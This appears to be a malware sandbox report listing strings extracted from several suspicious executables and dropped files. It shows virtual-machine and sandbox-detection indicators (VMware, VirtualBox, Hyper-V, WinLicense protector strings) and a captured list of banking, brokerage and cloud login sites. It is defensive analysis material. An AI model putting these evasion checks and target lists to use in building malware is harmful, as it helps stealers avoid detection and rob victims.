Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: AKFHDBFI.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: AKFHDBFI.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: AKFHDBFI.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000D.00000002.3229087178.00000000006A4000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: AKFHDBFI.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AKFHDBFI.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: AKFHDBFI.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: AKFHDBFI.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: AKFHDBFI.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.4.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000FEC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.00000000003CC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: AKFHDBFI.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: AKFHDBFI.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000FEC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.00000000003CC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000FEC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.00000000003CC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: EHDHDHIECG.exe, 00000006.00000002.2284909895.00000000008D4000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 00000009.00000002.2316242908.00000000006A4000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000A.00000002.2326357580.00000000006A4000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000D.00000002.3229087178.00000000006A4000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: AKFHDBFI.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000202C000.00000004.00000020.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002056000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000D.00000002.3230163969.000000000125C000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000D.00000002.3230163969.0000000001229000.00000004.00000020.00020000.00000000.sdmp, a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000131B000.00000004.00000020.00020000.00000000.sdmp, a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000134A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: AKFHDBFI.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000001FEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware}r
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: AKFHDBFI.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: AKFHDBFI.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
